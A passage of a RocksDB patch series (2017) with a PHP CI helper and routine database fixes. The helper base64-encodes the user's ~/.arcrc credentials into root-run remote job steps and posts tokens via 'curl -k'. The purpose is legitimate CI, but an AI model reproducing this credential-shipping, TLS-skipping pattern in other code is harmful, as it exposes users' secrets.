updateTestStatus($diffID, $test) { + assert(strlen($diffID) > 0); + assert(is_numeric($diffID)); + assert(strlen($test) > 0); + + shell_exec(buildUpdateTestStatusCmd($diffID, $test, "waiting")); +} + +function getSteps($applyDiff, $diffID, $username, $test) { + assert(strlen($username) > 0); + assert(strlen($test) > 0); + + if ($applyDiff) { + assert(strlen($diffID) > 0); + assert(is_numeric($diffID)); + + $arcrc_content = (PHP_OS == "Darwin" ? + exec("cat ~/.arcrc | gzip -f | base64") : + exec("cat ~/.arcrc | gzip -f | base64 -w0")); + assert(strlen($arcrc_content) > 0); + + // Sandcastle machines don't have arc setup. We copy the user certificate + // and authenticate using that in Sandcastle. + $setup = array( + "name" => "Setup arcrc", + "shell" => "echo " . $arcrc_content . " | base64 --decode" + . " | gzip -d > ~/.arcrc", + "user" => "root" + ); + + // arc demands certain permission on its config. + // also fix the sticky bit issue in sandcastle + $fix_permission = array( + "name" => "Fix environment", + "shell" => "chmod 600 ~/.arcrc && chmod +t /dev/shm", + "user" => "root" + ); + + // Construct the steps in the order of execution. + $steps[] = $setup; + $steps[] = $fix_permission; + } + + // fbcode is a sub-repo. We cannot patch until we add it to ignore otherwise + // Git thinks it is an uncommited change. + $fix_git_ignore = array( + "name" => "Fix git ignore", + "shell" => "echo fbcode >> .git/info/exclude", + "user" => "root" + ); + + // This fixes "FATAL: ThreadSanitizer can not mmap the shadow memory" + // Source: + // https://github.com/google/sanitizers/wiki/ThreadSanitizerCppManual#FAQ + $fix_kernel_issue = array( + "name" => "Fix kernel issue with tsan", + "shell" => "echo 2 >/proc/sys/kernel/randomize_va_space", + "user" => "root" + ); + + $steps[] = $fix_git_ignore; + $steps[] = $fix_kernel_issue; + + // This will be the command used to execute particular type of tests. + $cmd = ""; + + if ($applyDiff) { + // Patch the code (keep your fingures crossed). + $patch = array( + "name" => "Patch " . $diffID, + "shell" => "arc --arcrc-file ~/.arcrc " + . "patch --nocommit --diff " . $diffID, + "user" => "root" + ); + + $steps[] = $patch; + + updateTestStatus($diffID, $test); + $cmd = buildUpdateTestStatusCmd($diffID, $test, "running") . "; "; + } + + // Run the actual command. + $cmd = $cmd . "J=$(nproc) ./build_tools/precommit_checker.py " . $test + . "; exit_code=$?; "; + + if ($applyDiff) { + $cmd = $cmd . "([[ \$exit_code -eq 0 ]] &&" + . buildUpdateTestStatusCmd($diffID, $test, "pass") . ")" + . "||" . buildUpdateTestStatusCmd($diffID, $test, "fail") + . "; "; + } + + // shell command to sort the tests based on exit code and print + // the output of the log files. + $cat_sorted_logs = " + while read code log_file; + do echo \"################ cat \$log_file [exit_code : \$code] ################\"; + cat \$log_file; + done < <(tail -n +2 LOG | sort -k7,7n -k4,4gr | awk '{print \$7,\$NF}')"; + + // Shell command to cat all log files + $cat_all_logs = "for f in `ls t/!(run-*)`; do echo \$f;cat \$f; done"; + + // If LOG file exist use it to cat log files sorted by exit code, otherwise + // cat everything + $logs_cmd = "if [ -f LOG ]; then {$cat_sorted_logs}; else {$cat_all_logs}; fi"; + + $cmd = $cmd . " cat /tmp/precommit-check.log" + . "; shopt -s extglob; {$logs_cmd}" + . "; shopt -u extglob; [[ \$exit_code -eq 0 ]]"; + assert(strlen($cmd) > 0); + + $run_test = array( + "name" => "Run " . $test, + "shell" => $cmd, + "user" => "root", + "parser" => "python build_tools/error_filter.py " . $test, + ); + + $steps[] = $run_test; + + if ($applyDiff) { + // Clean up the user arc config we are using. + $cleanup = array( + "name" => "Arc cleanup", + "shell" => "rm -f ~/.arcrc", + "user" => "root" + ); + + $steps[] = $cleanup; + } + + assert(count($steps) > 0); + return $steps; +} + +function getSandcastleConfig() { + $sandcastle_config = array(); + + $cwd = getcwd(); + $cwd_token_file = "{$cwd}/.sandcastle"; + // This is a case when we're executed from a continuous run. Fetch the values + // from the environment. + if (getenv(ENV_POST_RECEIVE_HOOK)) { + $sandcastle_config[0] = getenv(ENV_HTTPS_APP_VALUE); + $sandcastle_config[1] = getenv(ENV_HTTPS_TOKEN_VALUE); + } else { + // This is a typical `[p]arc diff` case. Fetch the values from the specific + // configuration files. + for ($i = 0; $i < 50; $i++) { + if (file_exists(PRIMARY_TOKEN_FILE) || + file_exists($cwd_token_file)) { + break; + } + // If we failed to fetch the tokens, sleep for 0.2 second and try again + usleep(200000); + } + assert(file_exists(PRIMARY_TOKEN_FILE) || + file_exists($cwd_token_file)); + + // Try the primary location first, followed by a secondary. + if (file_exists(PRIMARY_TOKEN_FILE)) { + $cmd = 'cat ' . PRIMARY_TOKEN_FILE; + } else { + $cmd = 'cat ' . $cwd_token_file; + } + + assert(strlen($cmd) > 0); + $sandcastle_config = explode(':', rtrim(shell_exec($cmd))); + } + + // In this case be very explicit about the implications. + if (count($sandcastle_config) != 2) { + echo "Sandcastle configuration files don't contain valid information " . + "or the necessary environment variables aren't defined. Unable " . + "to validate the code changes."; + exit(1); + } + + assert(strlen($sandcastle_config[0]) > 0); + assert(strlen($sandcastle_config[1]) > 0); + assert(count($sandcastle_config) > 0); + + return $sandcastle_config; +} + +// This function can be called either from `[p]arc diff` command or during +// the Git post-receive hook. + function startTestsInSandcastle($applyDiff, $workflow, $diffID) { + // Default options don't terminate on failure, but that's what we want. In + // the current case we use assertions intentionally as "terminate on failure + // invariants". + assert_options(ASSERT_BAIL, true); + + // In case of a diff we'll send notificatios to the author. Else it'll go to + // the entire team because failures indicate that build quality has regressed. + $username = $applyDiff ? exec("whoami") : CONT_RUN_ALIAS; + assert(strlen($username) > 0); + + if ($applyDiff) { + assert($workflow); + assert(strlen($diffID) > 0); + assert(is_numeric($diffID)); + } + + // List of tests we want to run in Sandcastle. + $tests = array("unit", "unit_non_shm", "unit_481", "clang_unit", "tsan", + "asan", "lite_test", "valgrind", "release", "release_481", + "clang_release", "clang_analyze", "code_cov", + "java_build", "no_compression", "unity", "ubsan"); + + $send_email_template = array( + 'type' => 'email', + 'triggers' => array('fail'), + 'emails' => array($username . '@fb.com'), + ); + + // Construct a job definition for each test and add it to the master plan. + foreach ($tests as $test) { + $stepName = "RocksDB diff " . $diffID . " test " . $test; + + if (!$applyDiff) { + $stepName = "RocksDB continuous integration test " . $test; + } + + $arg[] = array( + "name" => $stepName, + "report" => array($send_email_template), + "steps" => getSteps($applyDiff, $diffID, $username, $test) + ); + } + + // We cannot submit the parallel execution master plan to Sandcastle and + // need supply the job plan as a determinator. So we construct a small job + // that will spit out the master job plan which Sandcastle will parse and + // execute. Why compress the job definitions? Otherwise we run over the max + // string size. + $cmd = "echo " . base64_encode(json_encode($arg)) + . (PHP_OS == "Darwin" ? + " | gzip -f | base64" : + " | gzip -f | base64 -w0"); + assert(strlen($cmd) > 0); + + $arg_encoded = shell_exec($cmd); + assert(strlen($arg_encoded) > 0); + + $runName = "Run diff " . $diffID . "for user " . $username; + + if (!$applyDiff) { + $runName = "RocksDB continuous integration build and test run"; + } + + $command = array( + "name" => $runName, + "steps" => array() + ); + + $command["steps"][] = array( + "name" => "Generate determinator", + "shell" => "echo " . $arg_encoded . " | base64 --decode | gzip -d" + . " | base64 --decode", + "determinator" => true, + "user" => "root" + ); + + // Submit to Sandcastle. + $url = 'https://interngraph.intern.facebook.com/sandcastle/create'; + + $job = array( + 'command' => 'SandcastleUniversalCommand', + 'args' => $command, + 'capabilities' => array( + 'vcs' => 'rocksdb-int-git', + 'type' => 'lego', + ), + 'hash' => 'origin/master', + 'user' => $username, + 'alias' => 'rocksdb-precommit', + 'tags' => array('rocksdb'), + 'description' => 'Rocksdb precommit job', + ); + + // Fetch the configuration necessary to submit a successful HTTPS request. + $sandcastle_config = getSandcastleConfig(); + + $app = $sandcastle_config[0]; + $token = $sandcastle_config[1]; + + $cmd = 'curl -s -k -F app=' . $app . ' ' + . '-F token=' . $token . ' -F job=\'' . json_encode($job) + .'\' "' . $url . '"'; + + $output = shell_exec($cmd); + assert(strlen($output) > 0); + + // Extract Sandcastle URL from the response. + preg_match('/url": "(.+)"/', $output, $sandcastle_url); + + assert(count($sandcastle_url) > 0, "Unable to submit Sandcastle request."); + assert(strlen($sandcastle_url[1]) > 0, "Unable to extract Sandcastle URL."); + + if ($applyDiff) { + echo "\nSandcastle URL: " . $sandcastle_url[1] . "\n"; + // Ask Phabricator to display it on the diff UI. + postURL($diffID, $sandcastle_url[1]); + } else { + echo "Continuous integration started Sandcastle tests. You can look at "; + echo "the progress at:\n" . $sandcastle_url[1] . "\n"; + } +} + +// Continuous run cript will set the environment variable and based on that +// we'll trigger the execution of tests in Sandcastle. In that case we don't +// need to apply any diffs and there's no associated workflow either. +if (getenv(ENV_POST_RECEIVE_HOOK)) { + startTestsInSandcastle( + false /* $applyDiff */, + NULL /* $workflow */, + NULL /* $diffID */); +} diff --git a/build_tools/cont_integration.sh b/build_tools/cont_integration.sh index 9d0f7766a2c..4e1905e7e31 100755 --- a/build_tools/cont_integration.sh +++ b/build_tools/cont_integration.sh @@ -67,7 +67,7 @@ function update_repo_status { # # Path to the determinator from the root of the RocksDB repo. -CONTRUN_DETERMINATOR=./arcanist_util/config/RocksDBCommonHelper.php +CONTRUN_DETERMINATOR=./build_tools/RocksDBCommonHelper.php # Value of the previous commit. PREV_COMMIT= From e7697b8ce82bf48be4aac168303aebd1c2f61419 Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Wed, 26 Jul 2017 21:02:53 -0700 Subject: [PATCH 048/205] Fix LITE unit tests Summary: Closes https://github.com/facebook/rocksdb/pull/2649 Differential Revision: D5505778 Pulled By: siying fbshipit-source-id: 7e935603ede3d958ea087ed6b8cfc4121e8797bc --- db/db_io_failure_test.cc | 2 +- db/db_test2.cc | 3 ++- db/db_test_util.cc | 17 ++++++++++++++--- util/file_reader_writer_test.cc | 8 +++++++- 4 files changed, 24 insertions(+), 6 deletions(-) diff --git a/db/db_io_failure_test.cc b/db/db_io_failure_test.cc index e93961c13d0..9f4dcc5d056 100644 --- a/db/db_io_failure_test.cc +++ b/db/db_io_failure_test.cc @@ -204,7 +204,6 @@ TEST_F(DBIOFailureTest, ManifestWriteError) { ASSERT_EQ("bar2", Get("foo2")); } } -#endif // ROCKSDB_LITE TEST_F(DBIOFailureTest, PutFailsParanoid) { // Test the following: @@ -559,6 +558,7 @@ TEST_F(DBIOFailureTest, CompactionSstSyncError) { ASSERT_EQ("bar3", Get(1, "foo")); } #endif // !(defined NDEBUG) || !defined(OS_WIN) +#endif // ROCKSDB_LITE } // namespace rocksdb int main(int argc, char** argv) { diff --git a/db/db_test2.cc b/db/db_test2.cc index aa10789c851..ca8986c4d8d 100644 --- a/db/db_test2.cc +++ b/db/db_test2.cc @@ -2236,6 +2236,7 @@ TEST_F(DBTest2, LowPriWrite) { ASSERT_EQ(1, rate_limit_count.load()); } +#ifndef ROCKSDB_LITE TEST_F(DBTest2, RateLimitedCompactionReads) { // compaction input has 512KB data const int kNumKeysPerFile = 128; @@ -2299,7 +2300,7 @@ TEST_F(DBTest2, RateLimitedCompactionReads) { options.rate_limiter->GetTotalBytesThrough(Env::IO_LOW))); } } - +#endif // ROCKSDB_LITE } // namespace rocksdb int main(int argc, char** argv) { diff --git a/db/db_test_util.cc b/db/db_test_util.cc index 5ca4b19a253..c4d465ba117 100644 --- a/db/db_test_util.cc +++ b/db/db_test_util.cc @@ -42,13 +42,24 @@ SpecialEnv::SpecialEnv(Env* base) non_writable_count_ = 0; table_write_callback_ = nullptr; } - +#ifndef ROCKSDB_LITE ROT13BlockCipher rot13Cipher_(16); +#endif // ROCKSDB_LITE DBTestBase::DBTestBase(const std::string path) : mem_env_(!getenv("MEM_ENV") ? nullptr : new MockEnv(Env::Default())), - encrypted_env_(!getenv("ENCRYPTED_ENV") ? nullptr : NewEncryptedEnv(mem_env_ ? mem_env_ : Env::Default(), new CTREncryptionProvider(rot13Cipher_))), - env_(new SpecialEnv(encrypted_env_ ? encrypted_env_ : (mem_env_ ? mem_env_ : Env::Default()))), +#ifndef ROCKSDB_LITE + encrypted_env_( + !getenv("ENCRYPTED_ENV") + ? nullptr + : NewEncryptedEnv(mem_env_ ? mem_env_ : Env::Default(), + new CTREncryptionProvider(rot13Cipher_))), +#else + encrypted_env_(nullptr), +#endif // ROCKSDB_LITE + env_(new SpecialEnv(encrypted_env_ + ? encrypted_env_ + : (mem_env_ ? mem_env_ : Env::Default()))), option_config_(kDefault) { env_->SetBackgroundThreads(1, Env::LOW); env_->SetBackgroundThreads(1, Env::HIGH); diff --git a/util/file_reader_writer_test.cc b/util/file_reader_writer_test.cc index dac5182452b..45675e9dd76 100644 --- a/util/file_reader_writer_test.cc +++ b/util/file_reader_writer_test.cc @@ -143,7 +143,13 @@ TEST_F(WritableFileWriterTest, IncrementalBuffer) { env_options.writable_file_max_buffer_size = (attempt < kNumAttempts / 2) ? 512 * 1024 : 700 * 1024; std::string actual; - unique_ptr wf(new FakeWF(&actual, attempt % 2 == 1, no_flush)); + unique_ptr wf(new FakeWF(&actual, +#ifndef ROCKSDB_LITE + attempt % 2 == 1, +#else + false, +#endif + no_flush)); unique_ptr writer( new WritableFileWriter(std::move(wf), env_options)); From f33f1136831e01232f532439628359f72188e419 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Thu, 27 Jul 2017 12:10:41 -0700 Subject: [PATCH 049/205] fix db_bench argument type Summary: it should be a bool Closes https://github.com/facebook/rocksdb/pull/2653 Differential Revision: D5506148 Pulled By: ajkr fbshipit-source-id: f142f0f3aa8b678c68adef12e5ac6e1e163306f3 --- tools/db_bench_tool.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/db_bench_tool.cc b/tools/db_bench_tool.cc index 0cc424eeab2..d10758f04ab 100644 --- a/tools/db_bench_tool.cc +++ b/tools/db_bench_tool.cc @@ -434,7 +434,7 @@ DEFINE_int32(file_opening_threads, rocksdb::Options().max_file_opening_threads, "If open_files is set to -1, this option set the number of " "threads that will be used to open files during DB::Open()"); -DEFINE_int32(new_table_reader_for_compaction_inputs, true, +DEFINE_bool(new_table_reader_for_compaction_inputs, true, "If true, uses a separate file handle for compaction inputs"); DEFINE_int32(compaction_readahead_size, 0, "Compaction readahead size"); From d12691b86fb788f0ee7180db626c4ea2445fa976 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Thu, 27 Jul 2017 12:10:49 -0700 Subject: [PATCH 050/205] move TableCache::EraseHandle outside of db mutex Summary: Post-compaction work holds onto db mutex for the longest time (found by tracing lock acquires/releases with LTTng and correlating timestamps with our info log). Further experimentation showed `TableCache::EraseHandle` is responsible for ~86% of time mutex is held. We can just release the handle outside the db mutex. Closes https://github.com/facebook/rocksdb/pull/2654 Differential Revision: D5507126 Pulled By: ajkr fbshipit-source-id: 703c01ddf2aea16bc0f9e33c08935d78aa6b781d --- db/db_impl_files.cc | 3 +++ db/version_set.cc | 4 ---- 2 files changed, 3 insertions(+), 4 deletions(-) diff --git a/db/db_impl_files.cc b/db/db_impl_files.cc index 3bbf94c293b..e44e4231895 100644 --- a/db/db_impl_files.cc +++ b/db/db_impl_files.cc @@ -368,6 +368,9 @@ void DBImpl::PurgeObsoleteFiles(const JobContext& state, bool schedule_only) { candidate_files.emplace_back( MakeTableFileName(kDumbDbName, file->fd.GetNumber()), file->fd.GetPathId()); + if (file->table_reader_handle) { + table_cache_->Release(file->table_reader_handle); + } delete file; } diff --git a/db/version_set.cc b/db/version_set.cc index 0069d86c1dd..ffbdd46cd1a 100644 --- a/db/version_set.cc +++ b/db/version_set.cc @@ -328,10 +328,6 @@ Version::~Version() { assert(f->refs > 0); f->refs--; if (f->refs <= 0) { - if (f->table_reader_handle) { - cfd_->table_cache()->EraseHandle(f->fd, f->table_reader_handle); - f->table_reader_handle = nullptr; - } vset_->obsolete_files_.push_back(f); } } From 7f6d012d70ec540f0726cd3fe38ad1d3d723396c Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Thu, 27 Jul 2017 13:35:39 -0700 Subject: [PATCH 051/205] "ccache -C" in Travis Summary: This is to work around the problem of build error: util/threadpool_imp.o: file not recognized: File truncated Just to make the build go through. We should remove it later if we find the real long-term solution. Closes https://github.com/facebook/rocksdb/pull/2657 Differential Revision: D5511034 Pulled By: siying fbshipit-source-id: 229f024bd78ee96799017d4a89be74253058ec30 --- .travis.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.travis.yml b/.travis.yml index 7e2bf115c3f..887fbfc2f18 100644 --- a/.travis.yml +++ b/.travis.yml @@ -57,7 +57,7 @@ before_script: script: - ${CXX} --version - - if [ "${TEST_GROUP}" == 'platform_dependent' ]; then OPT=-DTRAVIS V=1 make -j4 all; OPT=-DTRAVIS V=1 ROCKSDBTESTS_END=db_block_cache_test make -j4 check_some; fi + - if [ "${TEST_GROUP}" == 'platform_dependent' ]; then ccache -C && OPT=-DTRAVIS V=1 make -j4 all && OPT=-DTRAVIS V=1 ROCKSDBTESTS_END=db_block_cache_test make -j4 check_some; fi - if [ "${TEST_GROUP}" == '1' ]; then OPT=-DTRAVIS V=1 ROCKSDBTESTS_START=db_block_cache_test ROCKSDBTESTS_END=comparator_db_test make -j4 check_some; fi - if [ "${TEST_GROUP}" == '2' ]; then OPT=-DTRAVIS V=1 ROCKSDBTESTS_START=comparator_db_test make -j4 check_some; fi - if [ "${JOB_NAME}" == 'java_test' ]; then OPT=-DTRAVIS V=1 make clean jclean && make rocksdbjava jtest; fi From 8f553d3c524bd2529613e9217020942006a9df63 Mon Sep 17 00:00:00 2001 From: Aaron Gao Date: Thu, 27 Jul 2017 14:17:10 -0700 Subject: [PATCH 052/205] remove unnecessary internal_comparator param in newIterator Summary: solved https://github.com/facebook/rocksdb/issues/2604 Closes https://github.com/facebook/rocksdb/pull/2648 Differential Revision: D5504875 Pulled By: lightmark fbshipit-source-id: c14bb62ccbdc9e7bda9cd914cae4ea0765d882ee --- db/table_cache.cc | 3 +-- table/block_based_table_reader.cc | 9 +++++---- table/block_based_table_reader.h | 1 - table/cuckoo_table_reader.cc | 3 +-- table/cuckoo_table_reader.h | 1 - table/mock_table.cc | 1 - table/mock_table.h | 1 - table/plain_table_reader.cc | 1 - table/plain_table_reader.h | 3 +-- table/table_reader.h | 1 - 10 files changed, 8 insertions(+), 16 deletions(-) diff --git a/db/table_cache.cc b/db/table_cache.cc index 4dc56935fbc..a1a03d3bed7 100644 --- a/db/table_cache.cc +++ b/db/table_cache.cc @@ -225,8 +225,7 @@ InternalIterator* TableCache::NewIterator( } InternalIterator* result = nullptr; if (s.ok()) { - result = - table_reader->NewIterator(options, arena, &icomparator, skip_filters); + result = table_reader->NewIterator(options, arena, skip_filters); if (create_new_table_reader) { assert(handle == nullptr); result->RegisterCleanup(&DeleteTableReader, table_reader, nullptr); diff --git a/table/block_based_table_reader.cc b/table/block_based_table_reader.cc index 123e1814ab7..3c4f0b80ee5 100644 --- a/table/block_based_table_reader.cc +++ b/table/block_based_table_reader.cc @@ -1545,11 +1545,12 @@ bool BlockBasedTable::PrefixMayMatch(const Slice& internal_key) { return may_match; } -InternalIterator* BlockBasedTable::NewIterator( - const ReadOptions& read_options, Arena* arena, - const InternalKeyComparator* icomp, bool skip_filters) { +InternalIterator* BlockBasedTable::NewIterator(const ReadOptions& read_options, + Arena* arena, + bool skip_filters) { return NewTwoLevelIterator( - new BlockEntryIteratorState(this, read_options, icomp, skip_filters), + new BlockEntryIteratorState(this, read_options, + &rep_->internal_comparator, skip_filters), NewIndexIterator(read_options), arena); } diff --git a/table/block_based_table_reader.h b/table/block_based_table_reader.h index 857ea56057b..8b3494ef56f 100644 --- a/table/block_based_table_reader.h +++ b/table/block_based_table_reader.h @@ -102,7 +102,6 @@ class BlockBasedTable : public TableReader { // @param skip_filters Disables loading/accessing the filter block InternalIterator* NewIterator( const ReadOptions&, Arena* arena = nullptr, - const InternalKeyComparator* icomparator = nullptr, bool skip_filters = false) override; InternalIterator* NewRangeTombstoneIterator( diff --git a/table/cuckoo_table_reader.cc b/table/cuckoo_table_reader.cc index 85670ad1daf..9cecebaebb7 100644 --- a/table/cuckoo_table_reader.cc +++ b/table/cuckoo_table_reader.cc @@ -364,8 +364,7 @@ extern InternalIterator* NewErrorInternalIterator(const Status& status, Arena* arena); InternalIterator* CuckooTableReader::NewIterator( - const ReadOptions& read_options, Arena* arena, - const InternalKeyComparator* icomp, bool skip_filters) { + const ReadOptions& read_options, Arena* arena, bool skip_filters) { if (!status().ok()) { return NewErrorInternalIterator( Status::Corruption("CuckooTableReader status is not okay."), arena); diff --git a/table/cuckoo_table_reader.h b/table/cuckoo_table_reader.h index f2b6d1a9cfe..4beac8f9d07 100644 --- a/table/cuckoo_table_reader.h +++ b/table/cuckoo_table_reader.h @@ -47,7 +47,6 @@ class CuckooTableReader: public TableReader { InternalIterator* NewIterator( const ReadOptions&, Arena* arena = nullptr, - const InternalKeyComparator* icomparator = nullptr, bool skip_filters = false) override; void Prepare(const Slice& target) override; diff --git a/table/mock_table.cc b/table/mock_table.cc index 4c9907e4599..86c380865c6 100644 --- a/table/mock_table.cc +++ b/table/mock_table.cc @@ -28,7 +28,6 @@ stl_wrappers::KVMap MakeMockFile( InternalIterator* MockTableReader::NewIterator(const ReadOptions&, Arena* arena, - const InternalKeyComparator*, bool skip_filters) { return new MockTableIterator(table_); } diff --git a/table/mock_table.h b/table/mock_table.h index 9e5396341c5..71609a173fb 100644 --- a/table/mock_table.h +++ b/table/mock_table.h @@ -40,7 +40,6 @@ class MockTableReader : public TableReader { InternalIterator* NewIterator(const ReadOptions&, Arena* arena, - const InternalKeyComparator* = nullptr, bool skip_filters = false) override; Status Get(const ReadOptions&, const Slice& key, GetContext* get_context, diff --git a/table/plain_table_reader.cc b/table/plain_table_reader.cc index 0f9449e8669..92933b34ba1 100644 --- a/table/plain_table_reader.cc +++ b/table/plain_table_reader.cc @@ -191,7 +191,6 @@ void PlainTableReader::SetupForCompaction() { InternalIterator* PlainTableReader::NewIterator(const ReadOptions& options, Arena* arena, - const InternalKeyComparator*, bool skip_filters) { bool use_prefix_seek = !IsTotalOrderMode() && !options.total_order_seek; if (arena == nullptr) { diff --git a/table/plain_table_reader.h b/table/plain_table_reader.h index 236bab4fd52..6bf8da2f988 100644 --- a/table/plain_table_reader.h +++ b/table/plain_table_reader.h @@ -71,7 +71,7 @@ class PlainTableReader: public TableReader { public: static Status Open(const ImmutableCFOptions& ioptions, const EnvOptions& env_options, - const InternalKeyComparator& icomparator, + const InternalKeyComparator& internal_comparator, unique_ptr&& file, uint64_t file_size, unique_ptr* table, const int bloom_bits_per_key, double hash_table_ratio, @@ -80,7 +80,6 @@ class PlainTableReader: public TableReader { InternalIterator* NewIterator(const ReadOptions&, Arena* arena = nullptr, - const InternalKeyComparator* = nullptr, bool skip_filters = false) override; void Prepare(const Slice& target) override; diff --git a/table/table_reader.h b/table/table_reader.h index 5f47468e6de..9681d54670e 100644 --- a/table/table_reader.h +++ b/table/table_reader.h @@ -40,7 +40,6 @@ class TableReader { // option is effective only for block-based table format. virtual InternalIterator* NewIterator(const ReadOptions&, Arena* arena = nullptr, - const InternalKeyComparator* = nullptr, bool skip_filters = false) = 0; virtual InternalIterator* NewRangeTombstoneIterator( From fca4d6da175f0a77e5f77ae439c69ab5208e229a Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Thu, 27 Jul 2017 17:15:48 -0700 Subject: [PATCH 053/205] Build fewer tests in Travis platform_dependent tests Summary: platform_dependent tests in Travis now builds all tests, which is not needed. Only build those tests we need to run. Closes https://github.com/facebook/rocksdb/pull/2647 Differential Revision: D5513954 Pulled By: siying fbshipit-source-id: 4d540b146124e70dd25586c47939d19f93655b0a --- .travis.yml | 2 +- Makefile | 2 ++ db/db_basic_test.cc | 2 ++ 3 files changed, 5 insertions(+), 1 deletion(-) diff --git a/.travis.yml b/.travis.yml index 887fbfc2f18..78e51915943 100644 --- a/.travis.yml +++ b/.travis.yml @@ -57,7 +57,7 @@ before_script: script: - ${CXX} --version - - if [ "${TEST_GROUP}" == 'platform_dependent' ]; then ccache -C && OPT=-DTRAVIS V=1 make -j4 all && OPT=-DTRAVIS V=1 ROCKSDBTESTS_END=db_block_cache_test make -j4 check_some; fi + - if [ "${TEST_GROUP}" == 'platform_dependent' ]; then ccache -C && OPT=-DTRAVIS V=1 ROCKSDBTESTS_END=db_block_cache_test make -j4 all_but_some_tests check_some; fi - if [ "${TEST_GROUP}" == '1' ]; then OPT=-DTRAVIS V=1 ROCKSDBTESTS_START=db_block_cache_test ROCKSDBTESTS_END=comparator_db_test make -j4 check_some; fi - if [ "${TEST_GROUP}" == '2' ]; then OPT=-DTRAVIS V=1 ROCKSDBTESTS_START=comparator_db_test make -j4 check_some; fi - if [ "${JOB_NAME}" == 'java_test' ]; then OPT=-DTRAVIS V=1 make clean jclean && make rocksdbjava jtest; fi diff --git a/Makefile b/Makefile index c40d741d7a8..55f642135ed 100644 --- a/Makefile +++ b/Makefile @@ -575,6 +575,8 @@ endif # PLATFORM_SHARED_EXT all: $(LIBRARY) $(BENCHMARKS) tools tools_lib test_libs $(TESTS) +all_but_some_tests: $(LIBRARY) $(BENCHMARKS) tools tools_lib test_libs $(SUBSET) + static_lib: $(LIBRARY) shared_lib: $(SHARED) diff --git a/db/db_basic_test.cc b/db/db_basic_test.cc index 3d732f573ad..cfbe2c5676a 100644 --- a/db/db_basic_test.cc +++ b/db/db_basic_test.cc @@ -175,6 +175,8 @@ TEST_F(DBBasicTest, LevelLimitReopen) { int i = 0; while (NumTableFilesAtLevel(2, 1) == 0) { ASSERT_OK(Put(1, Key(i++), value)); + dbfull()->TEST_WaitForFlushMemTable(); + dbfull()->TEST_WaitForCompact(); } options.num_levels = 1; From 3a3fb00b7aab66ed9c9c2311c5178314fced9a1e Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Thu, 27 Jul 2017 17:34:04 -0700 Subject: [PATCH 054/205] TARGETS file not setting sse explicitly Summary: We don't need to set them explicitly. Closes https://github.com/facebook/rocksdb/pull/2660 Differential Revision: D5514141 Pulled By: yiwu-arbug fbshipit-source-id: 10edebfc3cfe0afc00a34519f87fcea4d65069ae --- buckifier/targets_cfg.py | 2 -- 1 file changed, 2 deletions(-) diff --git a/buckifier/targets_cfg.py b/buckifier/targets_cfg.py index 836493951ae..edc0e84556c 100644 --- a/buckifier/targets_cfg.py +++ b/buckifier/targets_cfg.py @@ -10,8 +10,6 @@ BUCK_BINS = "buck-out/gen/" + REPO_PATH TEST_RUNNER = REPO_PATH + "buckifier/rocks_test_runner.sh" rocksdb_compiler_flags = [ - "-msse", - "-msse4.2", "-fno-builtin-memcmp", "-DROCKSDB_PLATFORM_POSIX", "-DROCKSDB_LIB_IO_POSIX", From 710411aea6a2c74f7ca912988878d79aeffcefce Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Thu, 27 Jul 2017 20:16:25 -0700 Subject: [PATCH 055/205] fix asan/valgrind for TableCache cleanup Summary: Breaking commit: d12691b86fb788f0ee7180db626c4ea2445fa976 In the above commit, I moved the `TableCache` cleanup logic from `Version` destructor into `PurgeObsoleteFiles`. I missed cleaning up `TableCache` entries for the current `Version` during DB destruction. This PR adds that logic to `VersionSet` destructor. One unfortunate side effect is now we're potentially deleting `TableReader`s after `column_family_set_.reset()`, which means we can't call `BlockBasedTableReader::Close` a second time as the block cache might already be destroyed. Closes https://github.com/facebook/rocksdb/pull/2662 Differential Revision: D5515108 Pulled By: ajkr fbshipit-source-id: 2cb820e19aa813e0d258d17f76b2d7b6b7ee0b18 --- db/version_set.cc | 8 ++++++-- table/block_based_table_reader.cc | 4 ++++ table/block_based_table_reader.h | 1 + 3 files changed, 11 insertions(+), 2 deletions(-) diff --git a/db/version_set.cc b/db/version_set.cc index ffbdd46cd1a..f8465027bb5 100644 --- a/db/version_set.cc +++ b/db/version_set.cc @@ -2327,10 +2327,14 @@ void CloseTables(void* ptr, size_t) { VersionSet::~VersionSet() { // we need to delete column_family_set_ because its destructor depends on // VersionSet - column_family_set_->get_table_cache()->ApplyToAllCacheEntries(&CloseTables, - false); + Cache* table_cache = column_family_set_->get_table_cache(); + table_cache->ApplyToAllCacheEntries(&CloseTables, false /* thread_safe */); column_family_set_.reset(); for (auto file : obsolete_files_) { + if (file->table_reader_handle) { + table_cache->Release(file->table_reader_handle); + TableCache::Evict(table_cache, file->fd.GetNumber()); + } delete file; } obsolete_files_.clear(); diff --git a/table/block_based_table_reader.cc b/table/block_based_table_reader.cc index 3c4f0b80ee5..a0b58c6b26e 100644 --- a/table/block_based_table_reader.cc +++ b/table/block_based_table_reader.cc @@ -2083,6 +2083,9 @@ Status BlockBasedTable::DumpTable(WritableFile* out_file) { } void BlockBasedTable::Close() { + if (rep_->closed) { + return; + } rep_->filter_entry.Release(rep_->table_options.block_cache.get()); rep_->index_entry.Release(rep_->table_options.block_cache.get()); rep_->range_del_entry.Release(rep_->table_options.block_cache.get()); @@ -2099,6 +2102,7 @@ void BlockBasedTable::Close() { rep_->dummy_index_reader_offset, cache_key); rep_->table_options.block_cache.get()->Erase(key); } + rep_->closed = true; } Status BlockBasedTable::DumpIndexBlock(WritableFile* out_file) { diff --git a/table/block_based_table_reader.h b/table/block_based_table_reader.h index 8b3494ef56f..3acc3a8fb09 100644 --- a/table/block_based_table_reader.h +++ b/table/block_based_table_reader.h @@ -467,6 +467,7 @@ struct BlockBasedTable::Rep { // A value of kDisableGlobalSequenceNumber means that this feature is disabled // and every key have it's own seqno. SequenceNumber global_seqno; + bool closed = false; }; } // namespace rocksdb From 6083bc79f898fffcce5fca1e5c9f8932c62da4a1 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Thu, 27 Jul 2017 23:16:18 -0700 Subject: [PATCH 056/205] Blob DB TTL extractor Summary: Introducing 